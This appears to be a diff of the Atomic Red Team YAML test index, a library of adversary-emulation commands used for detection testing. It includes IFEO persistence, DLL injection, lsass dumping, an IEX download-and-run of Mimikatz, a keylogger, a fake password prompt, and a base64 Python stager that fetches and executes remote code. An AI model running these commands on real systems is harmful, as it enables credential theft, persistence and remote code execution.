REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v Debugger /d "#{payload_binary}"
command: 'REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
File Execution Options\#{target_binary}" /v Debugger /d "#{payload_binary}"
'
- name: IFEO GLobal Flags
description: |
Leverage Global Flags Settings
description: 'Leverage Global Flags Settings
'
supported_platforms:
- windows
input_arguments:
@@ -8315,8 +8649,14 @@ privilege-escalation:
default: cmd.exe
executor:
name: command_prompt
command: |
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v GlobalFlag /t REG_DWORD /d 512 REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\#{target_binary}" /v ReportingMode /t REG_DWORD /d 1 REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\#{target_binary}" /v MonitorProcess /d "#{payload_binary}"
command: 'REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
File Execution Options\#{target_binary}" /v GlobalFlag /t REG_DWORD /d 512
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\#{target_binary}"
/v ReportingMode /t REG_DWORD /d 1 REG ADD "HKLM\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\SilentProcessExit\#{target_binary}" /v MonitorProcess
/d "#{payload_binary}"
'
T1160:
technique:
name: Launch Daemon
@@ -8385,8 +8725,9 @@ privilege-escalation:
identifier: T1160
atomic_tests:
- name: Launch Daemon
description: |
TODO
description: 'TODO
'
supported_platforms:
- macos
executor:
@@ -8479,8 +8820,9 @@ privilege-escalation:
identifier: T1050
atomic_tests:
- name: Service Installation
description: |
Installs A Local Service
description: 'Installs A Local Service
'
supported_platforms:
- windows
input_arguments:
@@ -8500,8 +8842,9 @@ privilege-escalation:
sc.exe stop #{service_name}
sc.exe delete #{service_name}
- name: Service Installation PowerShell Installs A Local Service using PowerShell
description: |
Installs A Local Service via PowerShell
description: 'Installs A Local Service via PowerShell
'
supported_platforms:
- windows
input_arguments:
@@ -8583,8 +8926,9 @@ privilege-escalation:
identifier: T1150
atomic_tests:
- name: Plist Modification
description: |
TODO
description: 'TODO
'
supported_platforms:
- macos
executor:
@@ -8753,8 +9097,9 @@ privilege-escalation:
identifier: T1055
atomic_tests:
- name: Process Injection via mavinject.exe
description: |
Windows 10 Utility To Inject DLLS
description: 'Windows 10 Utility To Inject DLLS
'
supported_platforms:
- windows
input_arguments:
@@ -8768,11 +9113,13 @@ privilege-escalation:
default: "$pid"
executor:
name: powershell
command: |
mavinject $pid /INJECTRUNNING #{dll_payload}
command: 'mavinject $pid /INJECTRUNNING #{dll_payload}
'
- name: Process Injection via PowerSploit
description: |
PowerShell Injection using [PowerSploit Invoke-DLLInjection](https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-DllInjection.ps1)
description: 'PowerShell Injection using [PowerSploit Invoke-DLLInjection](https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-DllInjection.ps1)
'
supported_platforms:
- windows
input_arguments:
@@ -8786,8 +9133,9 @@ privilege-escalation:
default: "$pid"
executor:
name: powershell
command: |
Invoke-DllInjection.ps1 -ProcessID #{process_id} -Dll #{dll_payload}
command: 'Invoke-DllInjection.ps1 -ProcessID #{process_id} -Dll #{dll_payload}
'
T1053:
technique:
name: Scheduled Task
@@ -8887,8 +9235,9 @@ privilege-escalation:
- windows
executor:
name: command_prompt
command: |
at 13:20 /interactive cmd
command: 'at 13:20 /interactive cmd
'
- name: Scheduled task Local
description: ''
supported_platforms:
@@ -8904,11 +9253,13 @@ privilege-escalation:
default: 72600
executor:
name: command_prompt
command: |
SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time}
command: 'SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time}
'
- name: Scheduled task Remote
description: |
Create a task on a remote system
description: 'Create a task on a remote system
'
supported_platforms:
- windows
input_arguments:
@@ -8934,8 +9285,10 @@ privilege-escalation:
default: At0micStrong
executor:
name: command_prompt
command: |
SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time}
command: 'SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN
"Atomic task" /TR "#{task_command}" /SC daily /ST #{time}
'
T1166:
technique:
name: Setuid and Setgid
@@ -8982,8 +9335,9 @@ privilege-escalation:
identifier: T1166
atomic_tests:
- name: Setuid and Setgid
description: |
Setuid and Setgid
description: 'Setuid and Setgid
'
supported_platforms:
- macos
- centos
@@ -9071,11 +9425,14 @@ privilege-escalation:
- macos
executor:
name: manual
steps: |
1. /Library/StartupItems/StartupParameters.plist
steps: '1. /Library/StartupItems/StartupParameters.plist
'
- name: Startup Items (emond rule)
description: |
Establish persistence via a rule run by emond daemon at startup, based on https://posts.specterops.io/leveraging-emond-on-macos-for-persistence-a040a2785124
description: 'Establish persistence via a rule run by emond daemon at startup,
based on https://posts.specterops.io/leveraging-emond-on-macos-for-persistence-a040a2785124
'
supported_platforms:
- macos
input_arguments:
@@ -9138,8 +9495,9 @@ privilege-escalation:
identifier: T1169
atomic_tests:
- name: Sudo usage
description: |
Common Sudo enumeration methods.
description: 'Common Sudo enumeration methods.
'
supported_platforms:
- macos
- linux
@@ -9216,8 +9574,11 @@ privilege-escalation:
identifier: T1206
atomic_tests:
- name: Unlimited sudo cache timeout
description: |
Sets sudo caching timestamp_timeout to a value for unlimited. This is dangerous to modify without using 'visudo', do not do this on a production system.
description: 'Sets sudo caching timestamp_timeout to a value for unlimited.
This is dangerous to modify without using ''visudo'', do not do this on a
production system.
'
supported_platforms:
- macos
- linux
@@ -9227,8 +9588,10 @@ privilege-escalation:
sudo sed -i 's/env_reset.*$/env_reset,timestamp_timeout=-1/' /etc/sudoers
sudo visudo -c -f /etc/sudoers
- name: Disable tty_tickets for sudo caching
description: |
Sets sudo caching tty_tickets value to disabled. This is dangerous to modify without using 'visudo', do not do this on a production system.
description: 'Sets sudo caching tty_tickets value to disabled. This is dangerous
to modify without using ''visudo'', do not do this on a production system.
'
supported_platforms:
- macos
- linux
@@ -9297,8 +9660,9 @@ discovery:
identifier: T1087
atomic_tests:
- name: List all accounts
description: |
xxx
description: 'xxx
'
supported_platforms:
- linux
- macos
@@ -9309,11 +9673,13 @@ discovery:
default: "~/loot.txt"
executor:
name: sh
command: |
cat /etc/passwd > #{output_file}
command: 'cat /etc/passwd > #{output_file}
'
- name: View sudoers access
description: |
xxx (requires root)
description: 'xxx (requires root)
'
supported_platforms:
- linux
- macos
@@ -9324,11 +9690,13 @@ discovery:
default: "~/loot.txt"
executor:
name: sh
command: |
cat /etc/sudoers > #{output_file}
command: 'cat /etc/sudoers > #{output_file}
'
- name: View accounts with UID 0
description: |
xxx
description: 'xxx
'
supported_platforms:
- linux
- macos
@@ -9339,21 +9707,25 @@ discovery:
default: "~/loot.txt"
executor:
name: sh
command: |
grep 'x:0:' /etc/passwd > #{output_file}
command: 'grep ''x:0:'' /etc/passwd > #{output_file}
'
- name: List opened files by user
description: |
xxx
description: 'xxx
'
supported_platforms:
- linux
- macos
executor:
name: sh
command: |
username=$(echo $HOME | awk -F'/' '{print $3}') && lsof -u $username
command: 'username=$(echo $HOME | awk -F''/'' ''{print $3}'') && lsof -u $username
'
- name: Show if a user account has ever logger in remotely
description: |
xxx
description: 'xxx
'
supported_platforms:
- linux
- macos
@@ -9364,11 +9736,13 @@ discovery:
default: "~/loot.txt"
executor:
name: sh
command: |
lastlog > #{output_file}
command: 'lastlog > #{output_file}
'
- name: Enumerate Groups and users
description: |
utilize local utilities to identify users and groups
description: 'utilize local utilities to identify users and groups
'
supported_platforms:
- linux
- macos
@@ -9383,8 +9757,9 @@ discovery:
dscacheutil -q group
dscacheutil -q user
- name: Enumerate all user accounts
description: |
List all accounts
description: 'List all accounts
'
supported_platforms:
- windows
executor:
@@ -9397,8 +9772,9 @@ discovery:
net localgroup "Users"
net localgroup
- name: Enumerate all user accounts - PowerShell
description: |
List all accounts with PowerShell
description: 'List all accounts with PowerShell
'
supported_platforms:
- windows
executor:
@@ -9416,23 +9792,27 @@ discovery:
get-localgroup
net localgroup
- name: Get logged on Users
description: |
List logged on users
description: 'List logged on users
'
supported_platforms:
- windows
executor:
name: command_prompt
command: |
query user
command: 'query user
'
- name: Get logged on users PowerShell
description: |
List logged on users powershell
description: 'List logged on users powershell
'
supported_platforms:
- windows
executor:
name: powershell
command: |
query user
command: 'query user
'
'':
technique:
name: Peripheral Device Discovery
@@ -9518,23 +9898,31 @@ discovery:
identifier: T1217
atomic_tests:
- name: List Mozilla Firefox Bookmark Database Files on Linux
description: |
Searches for Mozilla Firefox's places.sqlite file (on Linux distributions) that contains bookmarks and lists any found instances to a text file.
description: 'Searches for Mozilla Firefox''s places.sqlite file (on Linux distributions)
that contains bookmarks and lists any found instances to a text file.
'
supported_platforms:
- linux
executor:
name: sh
command: |
find / -path "*.mozilla/firefox/*/places.sqlite" -exec echo {} >> /tmp/firefox-bookmarks.txt \;
command: 'find / -path "*.mozilla/firefox/*/places.sqlite" -exec echo {} >>
/tmp/firefox-bookmarks.txt \;
'
- name: List Mozilla Firefox Bookmark Database Files on macOS
description: |
Searches for Mozilla Firefox's places.sqlite file (on macOS) that contains bookmarks and lists any found instances to a text file.
description: 'Searches for Mozilla Firefox''s places.sqlite file (on macOS)
that contains bookmarks and lists any found instances to a text file.
'
supported_platforms:
- macos
executor:
name: sh
command: |
find / -path "*/Firefox/Profiles/*/places.sqlite" -exec echo {} >> /tmp/firefox-bookmarks.txt \;
command: 'find / -path "*/Firefox/Profiles/*/places.sqlite" -exec echo {}
>> /tmp/firefox-bookmarks.txt \;
'
T1083:
technique:
name: File and Directory Discovery
@@ -9595,8 +9983,9 @@ discovery:
identifier: T1083
atomic_tests:
- name: File and Directory Discovery
description: |
Find or discover files on the file system
description: 'Find or discover files on the file system
'
supported_platforms:
- windows
executor:
@@ -9611,8 +10000,9 @@ discovery:
dir "%userprofile%\Desktop\*.*" >> %temp%\download
tree /F >> %temp%\download
- name: File and Directory Discovery
description: |
Find or discover files on the file system
description: 'Find or discover files on the file system
'
supported_platforms:
- windows
executor:
@@ -9644,8 +10034,9 @@ discovery:
locate *
which sh
- name: Nix File and Directory Discovery
description: |
Find or discover files on the file system
description: 'Find or discover files on the file system
'
supported_platforms:
- macos
- linux
@@ -9702,8 +10093,9 @@ discovery:
identifier: T1046
atomic_tests:
- name: Port Scan
description: |
Scan ports to check for listening ports
description: 'Scan ports to check for listening ports
'
supported_platforms:
- linux
- macos
@@ -9715,8 +10107,9 @@ discovery:
echo >/dev/tcp/192.168.1.1/$port && echo "port $port is open" || echo "port $port is closed" : ;
done
- name: Port Scan Nmap
description: |
Scan ports to check for listening ports with Nmap.
description: 'Scan ports to check for listening ports with Nmap.
'
supported_platforms:
- linux
- macos
@@ -9801,8 +10194,9 @@ discovery:
identifier: T1135
atomic_tests:
- name: Network Share Discovery
description: |
Network Share Discovery
description: 'Network Share Discovery
'
supported_platforms:
- macos
- linux
@@ -9818,8 +10212,9 @@ discovery:
smbutil view -g //#{computer_name}
showmount #{computer_name}
- name: Network Share Discovery command prompt
description: |
Network Share Discovery utilizing the command prompt
description: 'Network Share Discovery utilizing the command prompt
'
supported_platforms:
- windows
input_arguments:
@@ -9829,11 +10224,13 @@ discovery:
default: computer1
executor:
name: command_prompt
command: |
net view \\#{computer_name}
command: 'net view \\#{computer_name}
'
- name: Network Share Discovery PowerShell
description: |
Network Share Discovery utilizing PowerShell
description: 'Network Share Discovery utilizing PowerShell
'
supported_platforms:
- windows
input_arguments:
@@ -9910,26 +10307,33 @@ discovery:
identifier: T1201
atomic_tests:
- name: Examine password complexity policy - Ubuntu
description: |
Lists the password complexity policy to console on Ubuntu Linux.
description: 'Lists the password complexity policy to console on Ubuntu Linux.
'
supported_platforms:
- ubuntu
executor:
name: bash
command: |
cat /etc/pam.d/common-password
command: 'cat /etc/pam.d/common-password
'
- name: Examine password complexity policy - CentOS/RHEL 7.x
description: |
Lists the password complexity policy to console on CentOS/RHEL 7.x Linux.
description: 'Lists the password complexity policy to console on CentOS/RHEL
7.x Linux.
'
supported_platforms:
- centos
executor:
name: bash
command: |
cat /etc/security/pwquality.conf
command: 'cat /etc/security/pwquality.conf
'
- name: Examine password complexity policy - CentOS/RHEL 6.x
description: |
Lists the password complexity policy to console on CentOS/RHEL 6.x Linux.
description: 'Lists the password complexity policy to console on CentOS/RHEL
6.x Linux.
'
supported_platforms:
- centos
executor:
@@ -9939,14 +10343,16 @@ discovery:
cat /etc/security/pwquality.conf
- name: Examine password expiration policy - All Linux
description: |
Lists the password expiration policy to console on CentOS/RHEL/Ubuntu.
description: 'Lists the password expiration policy to console on CentOS/RHEL/Ubuntu.
'
supported_platforms:
- linux
executor:
name: bash
command: |
cat /etc/login.defs
command: 'cat /etc/login.defs
'
T1069:
technique:
name: Permission Groups Discovery
@@ -9996,8 +10402,9 @@ discovery:
identifier: T1069
atomic_tests:
- name: Permission Groups Discovery
description: |
Permission Groups Discovery
description: 'Permission Groups Discovery
'
supported_platforms:
- macos
- linux
@@ -10008,8 +10415,9 @@ discovery:
dscl . -list /Groups
groups
- name: Permission Groups Discovery Windows
description: |
Permission Groups Discovery for Windows
description: 'Permission Groups Discovery for Windows
'
supported_platforms:
- windows
executor:
@@ -10018,8 +10426,9 @@ discovery:
net localgroup
net group /domain
- name: Permission Groups Discovery PowerShell
description: |
Permission Groups Discovery utilizing PowerShell
description: 'Permission Groups Discovery utilizing PowerShell
'
supported_platforms:
- windows
input_arguments:
@@ -10087,8 +10496,9 @@ discovery:
identifier: T1057
atomic_tests:
- name: Process Discovery - ps
description: |
Utilize ps to identify processes
description: 'Utilize ps to identify processes
'
supported_platforms:
- macos
- centos
@@ -10249,8 +10659,9 @@ discovery:
identifier: T1018
atomic_tests:
- name: Remote System Discovery - net
description: |
Identify remote systems with net.exe
description: 'Identify remote systems with net.exe
'
supported_platforms:
- windows
executor:
@@ -10259,43 +10670,52 @@ discovery:
net view /domain
net view
- name: Remote System Discover - ping sweep
description: |
Identify remote systems via ping sweep
description: 'Identify remote systems via ping sweep
'
supported_platforms:
- windows
executor:
name: command_prompt
command: |
for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i
command: 'for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i
'
- name: Remote System Discover - arp
description: |
Identify remote systems via arp
description: 'Identify remote systems via arp
'
supported_platforms:
- windows
executor:
name: command_prompt
command: |
arp -a
command: 'arp -a
'
- name: Remote System Discovery - arp nix
description: |
Identify remote systems via arp
description: 'Identify remote systems via arp
'
supported_platforms:
- linux
- macos
executor:
name: sh
command: |
arp -a | grep -v '^?'
command: 'arp -a | grep -v ''^?''
'
- name: Remote System Discovery - sweep
description: |
Identify remote systems via ping sweep
description: 'Identify remote systems via ping sweep
'
supported_platforms:
- linux
- macos
executor:
name: sh
command: |
for ip in $(seq 1 254); do ping -c 1 192.168.1.$ip -o; [ $? -eq 0 ] && echo "192.168.1.$ip UP" || : ; done
command: 'for ip in $(seq 1 254); do ping -c 1 192.168.1.$ip -o; [ $? -eq
0 ] && echo "192.168.1.$ip UP" || : ; done
'
T1063:
technique:
name: Security Software Discovery
@@ -10347,8 +10767,9 @@ discovery:
identifier: T1063
atomic_tests:
- name: Security Software Discovery
description: |
Methods to identify Security Software on an endpoint
description: 'Methods to identify Security Software on an endpoint
'
supported_platforms:
- windows
executor:
@@ -10361,8 +10782,9 @@ discovery:
tasklist.exe | findstr /i defender
tasklist.exe | findstr /i cylance
- name: Security Software Discovery - powershell
description: |
Methods to identify Security Software on an endpoint
description: 'Methods to identify Security Software on an endpoint
'
supported_platforms:
- windows
executor:
@@ -10373,8 +10795,9 @@ discovery:
get-process | ?{$_.Description -like "*defender*"}
get-process | ?{$_.Description -like "*cylance*"}
- name: Security Software Discovery - ps
description: |
Methods to identify Security Software on an endpoint
description: 'Methods to identify Security Software on an endpoint
'
supported_platforms:
- linux
- macos
@@ -10384,8 +10807,10 @@ discovery:
ps -ef | grep Little\ Snitch | grep -v grep
ps aux | grep CbOsxSensorService
- name: Security Software Discovery - Sysmon Service
description: |
Discovery of an installed Sysinternals Sysmon service using driver altitude (even if the name is changed).
description: 'Discovery of an installed Sysinternals Sysmon service using driver
altitude (even if the name is changed).
'
supported_platforms:
- windows
executor:
@@ -10440,8 +10865,9 @@ discovery:
identifier: T1082
atomic_tests:
- name: System Information Discovery
description: |
Identify System Info
description: 'Identify System Info
'
supported_platforms:
- windows
executor:
@@ -10450,8 +10876,9 @@ discovery:
systeminfo
reg query HKLM\SYSTEM\CurrentControlSet\Services\Disk\Enum
- name: System Information Discovery
description: |
Identify System Info
description: 'Identify System Info
'
supported_platforms:
- linux
- macos
@@ -10462,8 +10889,9 @@ discovery:
system_profiler
ls -al /Applications
- name: List OS Information
description: |
Identify System Info
description: 'Identify System Info
'
supported_platforms:
- linux
- macos
@@ -10515,8 +10943,9 @@ discovery:
identifier: T1016
atomic_tests:
- name: System Network Configuration Discovery
description: |
Identify network configuration information
description: 'Identify network configuration information
'
supported_platforms:
- windows
executor:
@@ -10528,8 +10957,9 @@ discovery:
nbtstat -n
net config
- name: System Network Configuration Discovery
description: |
Identify network configuration information
description: 'Identify network configuration information
'
supported_platforms:
- macos
- linux
@@ -10588,8 +11018,9 @@ discovery:
identifier: T1049
atomic_tests:
- name: System Network Connections Discovery
description: |
Get a listing of network connections.
description: 'Get a listing of network connections.
'
supported_platforms:
- windows
executor:
@@ -10599,17 +11030,20 @@ discovery:
net use
net sessions
- name: System Network Connections Discovery with PowerShell
description: |
Get a listing of network connections.
description: 'Get a listing of network connections.
'
supported_platforms:
- windows
executor:
name: powershell
command: |
Get-NetTCPConnection
command: 'Get-NetTCPConnection
'
- name: System Network Connections Discovery Linux & MacOS
description: |
Get a listing of network connections.
description: 'Get a listing of network connections.
'
supported_platforms:
- linux
- macos
@@ -10671,8 +11105,9 @@ discovery:
identifier: T1033
atomic_tests:
- name: System Owner/User Discovery
description: |
Identify System owner or users on an endpoint
description: 'Identify System owner or users on an endpoint
'
supported_platforms:
- windows
input_arguments:
@@ -10692,8 +11127,9 @@ discovery:
for /F "tokens=1,2" %i in ('qwinsta /server:#{computer_name} ^| findstr "Active Disc"') do @echo %i | find /v "#" | find /v "console" || echo %j > usernames.txt
@FOR /F %n in (computers.txt) DO @FOR /F "tokens=1,2" %i in ('qwinsta /server:%n ^| findstr "Active Disc"') do @echo %i | find /v "#" | find /v "console" || echo %j > usernames.txt
- name: System Owner/User Discovery
description: |
Identify System owner or users on an endpoint
description: 'Identify System owner or users on an endpoint
'
supported_platforms:
- linux
- macos
@@ -10744,8 +11180,9 @@ discovery:
identifier: T1007
atomic_tests:
- name: System Service Discovery
description: |
Identify system services
description: 'Identify system services
'
supported_platforms:
- windows
input_arguments:
@@ -10813,8 +11250,9 @@ discovery:
identifier: T1124
atomic_tests:
- name: System Time Discovery
description: |
Identify the system time
description: 'Identify the system time
'
supported_platforms:
- windows
input_arguments:
@@ -10828,14 +11266,16 @@ discovery:
net time \\#{computer_name}
w32tm /tz
- name: System Time Discovery - PowerShell
description: |
Identify the system time via PowerShell
description: 'Identify the system time via PowerShell
'
supported_platforms:
- windows
executor:
name: powershell
command: |
Get-Date
command: 'Get-Date
'
credential-access:
T1098:
technique:
@@ -10890,8 +11330,9 @@ credential-access:
identifier: T1098
atomic_tests:
- name: Admin Account Manipulate
description: |
Manipulate Admin Account Name
description: 'Manipulate Admin Account Name
'
supported_platforms:
- windows
executor:
@@ -10956,8 +11397,9 @@ credential-access:
identifier: T1139
atomic_tests:
- name: xxxx
description: |
xxxx
description: 'xxxx
'
supported_platforms:
- linux
- macos
@@ -10977,8 +11419,10 @@ credential-access:
default: "~/loot.txt"
executor:
name: sh
command: |
cat #{bash_history_filename} | grep #{bash_history_grep_args} > #{output_file}
command: 'cat #{bash_history_filename} | grep #{bash_history_grep_args} >
#{output_file}
'
T1110:
technique:
name: Brute Force
@@ -11047,8 +11491,10 @@ credential-access:
identifier: T1110
atomic_tests:
- name: Brute Force Credentials
description: |
Creates username and password files then attempts to brute force on remote host
description: 'Creates username and password files then attempts to brute force
on remote host
'
supported_platforms:
- windows
input_arguments:
@@ -11309,8 +11755,10 @@ credential-access:
identifier: T1003
atomic_tests:
- name: Powershell Mimikatz
description: |
Dumps Credentials via Powershell by invoking a remote mimikatz script
description: 'Dumps Credentials via Powershell by invoking a remote mimikatz
script
'
supported_platforms:
- windows
input_arguments:
@@ -11320,20 +11768,25 @@ credential-access:
default: https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1
executor:
name: powershell
command: |
IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds
command: 'IEX (New-Object Net.WebClient).DownloadString(''#{remote_script}'');
Invoke-Mimikatz -DumpCreds
'
- name: Gsecdump
description: |
https://www.truesec.se/sakerhet/verktyg/saakerhet/gsecdump_v2.0b5
description: 'https://www.truesec.se/sakerhet/verktyg/saakerhet/gsecdump_v2.0b5
'
supported_platforms:
- windows
executor:
name: command_prompt
command: |
gsecdump -a
command: 'gsecdump -a
'
- name: Windows Credential Editor
description: |
http://www.ampliasecurity.com/research/windows-credentials-editor/
description: 'http://www.ampliasecurity.com/research/windows-credentials-editor/
'
supported_platforms:
- windows
input_arguments:
@@ -11343,8 +11796,9 @@ credential-access:
default: output.txt
executor:
name: command_prompt
command: |
wce -o #{output_file}
command: 'wce -o #{output_file}
'
- name: Registry dump of SAM, creds, and secrets
description: |
Local SAM (SAM & System), cached credentials (System & Security) and LSA secrets (System & Security) can be enumerated
@@ -11370,8 +11824,9 @@ credential-access:
default: lsass_dump.dmp
executor:
name: command_prompt
command: |
procdump.exe -accepteula -ma lsass.exe #{output_file}
command: 'procdump.exe -accepteula -ma lsass.exe #{output_file}
'
- name: Dump LSASS.exe Memory using Windows Task Manager
description: "The memory of lsass.exe is often dumped for offline credential
theft attacks. This can be achieved with the Windows Task \nManager and administrative
@@ -11481,17 +11936,18 @@ credential-access:
identifier: T1081
atomic_tests:
- name: Browser and System credentials
description: |
[LaZagne Source](https://github.com/AlessandroZ/LaZagne)
description: "[LaZagne Source](https://github.com/AlessandroZ/LaZagne)\n"
supported_platforms:
- macos
executor:
name: sh
command: |
python2 laZagne.py all
command: 'python2 laZagne.py all
'
- name: Extract credentials from files
description: |
Extracting credentials from files
description: 'Extracting credentials from files
'
input_arguments:
file_path:
description: Path to search
@@ -11502,11 +11958,14 @@ credential-access:
- linux
executor:
name: sh
command: |
grep -riP password #{file_path}
command: 'grep -riP password #{file_path}
'
- name: Mimikatz & Kittenz
description: |
Mimikatz/kittenz - This will require a Mimikatz executable or invoke-mimikittenz ps module.
description: 'Mimikatz/kittenz - This will require a Mimikatz executable or
invoke-mimikittenz ps module.
'
supported_platforms:
- windows
executor:
@@ -11515,8 +11974,9 @@ credential-access:
invoke-mimikittenz
mimikatz.exe
- name: Extracting credentials from files
description: |
Extracting Credentials from Files
description: 'Extracting Credentials from Files
'
supported_platforms:
- windows
executor:
@@ -11581,8 +12041,9 @@ credential-access:
identifier: T1214
atomic_tests:
- name: Enumeration for Credentials in Registry
description: |
Queries to enumerate for credentials in the Registry.
description: 'Queries to enumerate for credentials in the Registry.
'
supported_platforms:
- windows
executor:
@@ -11773,8 +12234,9 @@ credential-access:
identifier: T1179
atomic_tests:
- name: Hook PowerShell TLS Encrypt/Decrypt Messages
description: |
Hooks functions in PowerShell to read TLS Communications
description: 'Hooks functions in PowerShell to read TLS Communications
'
supported_platforms:
- windows
input_arguments:
@@ -11871,8 +12333,7 @@ credential-access:
default: c:\key.log
executor:
name: powershell
command: |
.\Get-Keystrokes.ps1 -LogPath #{filepath}
command: ".\\Get-Keystrokes.ps1 -LogPath #{filepath}\n"
T1141:
technique:
name: Input Prompt
@@ -11930,8 +12391,13 @@ credential-access:
- macos
executor:
name: sh
command: |
osascript -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to display dialog "Software Update requires that you type your password to apply changes." & return & return default answer "" with icon 1 with hidden answer with title "Software Update"'
command: 'osascript -e ''tell app "System Preferences" to activate'' -e ''tell
app "System Preferences" to activate'' -e ''tell app "System Preferences"
to display dialog "Software Update requires that you type your password
to apply changes." & return & return default answer "" with icon 1 with
hidden answer with title "Software Update"''
'
T1142:
technique:
name: Keychain
@@ -12045,8 +12511,10 @@ credential-access:
identifier: T1040
atomic_tests:
- name: Packet Capture Linux
description: |
Perform a PCAP. Wireshark will be required for tshark. TCPdump may already be installed.
description: 'Perform a PCAP. Wireshark will be required for tshark. TCPdump
may already be installed.
'
supported_platforms:
- linux
input_arguments:
@@ -12060,8 +12528,10 @@ credential-access:
tcpdump -c 5 -nnni #{interface}
tshark -c 5 -i #{interface}
- name: Packet Capture MacOS
description: |
Perform a PCAP on MacOS. This will require Wireshark/tshark to be installed. TCPdump may already be installed.
description: 'Perform a PCAP on MacOS. This will require Wireshark/tshark to
be installed. TCPdump may already be installed.
'
supported_platforms:
- macos
input_arguments:
@@ -12244,8 +12714,10 @@ execution:
- macos
executor:
name: sh
command: |
osascript "do shell script "echo \"import sys,base64,warnings;warnings.filterwarnings('ignore');exec(base64.b64decode('aW1wb3J0IHN5cztpbXBvcnQgcmUsIHN1YnByb2Nlc3M7Y21kID0gInBzIC1lZiB8IGdyZXAgTGl0dGxlXCBTbml0Y2ggfCBncmVwIC12IGdyZXAiCnBzID0gc3VicHJvY2Vzcy5Qb3BlbihjbWQsIHNoZWxsPVRydWUsIHN0ZG91dD1zdWJwcm9jZXNzLlBJUEUpCm91dCA9IHBzLnN0ZG91dC5yZWFkKCkKcHMuc3Rkb3V0LmNsb3NlKCkKaWYgcmUuc2VhcmNoKCJMaXR0bGUgU25pdGNoIiwgb3V0KToKICAgc3lzLmV4aXQoKQppbXBvcnQgdXJsbGliMjsKVUE9J01vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNy4wOyBydjoxMS4wKSBsaWtlIEdlY2tvJztzZXJ2ZXI9J2h0dHA6Ly8xMjcuMC4wLjE6ODAnO3Q9Jy9sb2dpbi9wcm9jZXNzLnBocCc7cmVxPXVybGxpYjIuUmVxdWVzdChzZXJ2ZXIrdCk7CnJlcS5hZGRfaGVhZGVyKCdVc2VyLUFnZW50JyxVQSk7CnJlcS5hZGRfaGVhZGVyKCdDb29raWUnLCJzZXNzaW9uPXQzVmhWT3MvRHlDY0RURnpJS2FuUnhrdmszST0iKTsKcHJveHkgPSB1cmxsaWIyLlByb3h5SGFuZGxlcigpOwpvID0gdXJsbGliMi5idWlsZF9vcGVuZXIocHJveHkpOwp1cmxsaWIyLmluc3RhbGxfb3BlbmVyKG8pOwphPXVybGxpYjIudXJsb3BlbihyZXEpLnJlYWQoKTsKSVY9YVswOjRdO2RhdGE9YVs0Ol07a2V5PUlWKyc4Yzk0OThmYjg1YmQ1MTE5ZGQ5ODQ4MTJlZTVlOTg5OSc7UyxqLG91dD1yYW5nZSgyNTYpLDAsW10KZm9yIGkgaW4gcmFuZ2UoMjU2KToKICAgIGo9KGorU1tpXStvcmQoa2V5W2klbGVuKGtleSldKSklMjU2CiAgICBTW2ldLFNbal09U1tqXSxTW2ldCmk9aj0wCmZvciBjaGFyIGluIGRhdGE6CiAgICBpPShpKzEpJTI1NgogICAgaj0oaitTW2ldKSUyNTYKICAgIFNbaV0sU1tqXT1TW2pdLFNbaV0KICAgIG91dC5hcHBlbmQoY2hyKG9yZChjaGFyKV5TWyhTW2ldK1Nbal0pJTI1Nl0pKQpleGVjKCcnLmpvaW4ob3V0KSkK'));\" | python &""
